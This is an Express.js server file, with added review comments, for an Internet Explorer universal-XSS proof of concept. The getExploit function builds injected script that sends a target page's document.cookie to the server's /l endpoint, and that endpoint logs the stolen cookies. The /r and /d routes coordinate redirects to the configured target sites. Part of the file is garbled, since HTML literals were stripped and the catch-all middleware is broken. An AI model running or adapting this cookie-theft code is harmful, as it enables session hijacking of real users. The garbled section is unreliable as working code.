// File: app.js
// Author: l0th (Daniele Bellavista)
// Email: daniele.bellavista@gmail.com
//
// -*- coding: utf-8 -*-
// vim:fenc=utf-8
// vim:foldmethod=syntax
// vim:foldnestmax=1
//
// jslint es5: true
//
// Express server for the Internet Explorer universal-XSS proof of concept
// linked further down (deusen.co.uk / packetstormsecurity.com). It serves the
// PoC pages, pairs a redirect request with a waiting request per client
// token, and logs whatever the client-side script reports back to /l.
//
// NOTE(review): this extract was collapsed onto a few lines and its HTML
// string literals were stripped; the code has been reflowed here, the last
// middleware is kept verbatim because it cannot be reconstructed.

// NOTE(review): the semicolon is inside the quotes, so this is a plain string
// expression and NOT the strict-mode directive ("use strict"); the whole file
// runs in sloppy mode.
"use strict;";

var conf = require('./conf');
// Lookup table of redirect destinations; indexed by the numeric :id route
// parameter below (shape defined in ./conf, not visible here).
var targets = conf.targets;
var onFinished = require('on-finished');
// Public origin of this server, embedded into the generated client script.
var thisHost = conf.host;
var express = require('express');
var url = require('url');
var cookie = require('cookie');
var app = express();

// Disable caching on every response so the browser always re-requests the
// PoC pages and the per-token /r and /d endpoints.
app.use(function(req, res, next) {
  res.header("Cache-Control", "no-cache, no-store, must-revalidate");
  res.header("Pragma", "no-cache");
  res.header("Expires", 0);
  next();
});

// Per-client state keyed by the caller-supplied :rand token. Each entry holds
// the pending redirect response (redRes), its destination (redUrl) and the
// pending "wait" response (waiRes) until both halves have arrived.
// NOTE(review): a plain object keyed by untrusted input is a prototype
// pollution hazard — a token such as "__proto__" or "constructor" resolves on
// Object.prototype, passes the `!exploitObj[rand]` check in the handlers and
// the subsequent property writes land on the prototype. A Map or
// Object.create(null) plus an own-property check would avoid that.
var exploitObj = {};

// Answer the pending /r request with a redirect to its stored target, then,
// once that response has been fully written, release the paired /d request.
// Precondition: exploitObj[rand].redRes is set (callers check redRes/waiRes
// first). If redUrl is undefined (see targets[id] below) redirect() is called
// with undefined — behaviour then depends on Express.
function doRedirect(rand) {
  exploitObj[rand].redRes.redirect(exploitObj[rand].redUrl);
  onFinished(exploitObj[rand].redRes, function (err, res) {
    doWait(rand);
  });
}

// Hold the /d request for a further 500 ms after the redirect completed,
// answer it with an empty body and drop the per-token state once that
// response has finished. The onFinished error argument is ignored.
function doWait(rand) {
  setTimeout(function() {
    exploitObj[rand].waiRes.send('');
    onFinished(exploitObj[rand].waiRes, function(err, res) {
      delete exploitObj[rand];
    });
  }, 500);
}

// Initialise an empty state entry for a token. rDone is never read anywhere
// in this extract.
function create(rand) {
  exploitObj[rand] = { rDone: false, waiRes: null, redRes: null, redUrl: null };
}

// Redirect half of the pair: parks the response and the target URL; if the
// wait half is already present the redirect is issued immediately.
// NOTE(review): parseInt() has no radix and a non-numeric :id yields NaN, so
// targets[id] becomes undefined; a second /r for the same token silently
// replaces the earlier parked response, which is then never answered.
app.get('/r/:rand/:id', function(req, res, next) {
  var id = parseInt(req.params.id);
  var rand = req.params.rand;
  if (!exploitObj[rand]) create(rand);
  exploitObj[rand].redRes = res;
  exploitObj[rand].redUrl = targets[id];
  if (exploitObj[rand].waiRes) {
    doRedirect(rand);
  }
});

// Wait half of the pair: parks the response; if the redirect half is already
// present the redirect is issued immediately. `id` is parsed but unused here.
app.get('/d/:rand/:id', function(req, res, next) {
  var id = parseInt(req.params.id);
  var rand = req.params.rand;
  if (!exploitObj[rand]) create(rand);
  exploitObj[rand].waiRes = res;
  if (exploitObj[rand].redRes) {
    doRedirect(rand);
  }
});

// Collection endpoint: expects a query of the form `_id=<n>|<cookie string>`,
// parses the cookies and writes the matching target plus the parsed cookies
// to stdout.
// NOTE(review): captured cookie values go straight into the process log —
// treat that log as sensitive. The empty reply is sent before parsing, and
// `s` is null when the query does not match the regex, so the TypeError on
// `s[2]` reaches the error middleware after the headers have already gone
// out (likely a second "headers already sent" error there). unescape() is an
// Annex B legacy function; decodeURIComponent is the maintained equivalent.
app.get('/l', function(req, res, next) {
  res.send('');
  var u = url.parse(req.url);
  var s = /_id=(\d+)\|(.*)/.exec(u.query);
  var cs = cookie.parse(unescape(s[2]));
  console.log(targets[parseInt(s[1])]);
  console.log(JSON.stringify(cs, null, ' '));
});

// Build the inline client-side script for the PoC page. thisHost, rand and
// id are concatenated into the script source without any escaping, and rand
// comes directly from the route parameter. No call site survives in this
// extract — presumably it sat inside the HTML literals of the /exploit
// handler that were stripped. Kept verbatim.
function getExploit(rand, id) {
  return 'frames[0].eval(\'_=parent.frames[1];with(new XMLHttpRequest())open("get","' + thisHost + '/d/'
    + rand + '/' + id + '",false),send();_.location="javascript:bkp=\\\'' + thisHost + '/l?_id=' + id + '|\\\'+document.cookie;window.location(bkp);"\');';
}

// PoC page for one token/target pair. The three page fragments are empty in
// this extract (HTML literals stripped), so id and rand are unused here.
app.get('/exploit/:rand/:id', function(req, res, next) {
  var id = parseInt(req.params.id);
  var rand = req.params.rand;
  var page = [ '', '', '' ];
  res.send(page.join('\n'));
});

// Catch-all index page listing the configured targets; registered after the
// routes above, so it answers every path they do not match.
// NOTE(review): garbled from here to the error handler (string literals were
// cut mid-way by the extraction); left exactly as found.
app.use(function(req, res, next) { var page = [ "
You can read this content while the page does its work.
'); page.push('Original exploit: http://www.deusen.co.uk/items/insider3show.3362009741042107/
'); page.push('Further POC: http://packetstormsecurity.com/files/130308/Microsoft-Internet-Explorer-Universal-XSS-Proof-Of-Concept.html
'); for (var k = 0; k < targets.length; k++) { page.push(''); } page.push(''); res.send(page.join('\n')); });
// Error middleware: logs the stack and replies with an empty body. No status
// code is set, so the reply presumably goes out as 200 rather than 500.
app.use(function(err, req, res, next) { console.error(err.stack); res.send(''); });
// NOTE(review): listen() without a host binds on all interfaces; bind to
// 127.0.0.1 unless the PoC must be reachable from other machines.
var http = require('http'); var server = http.createServer(app); server.listen(8080);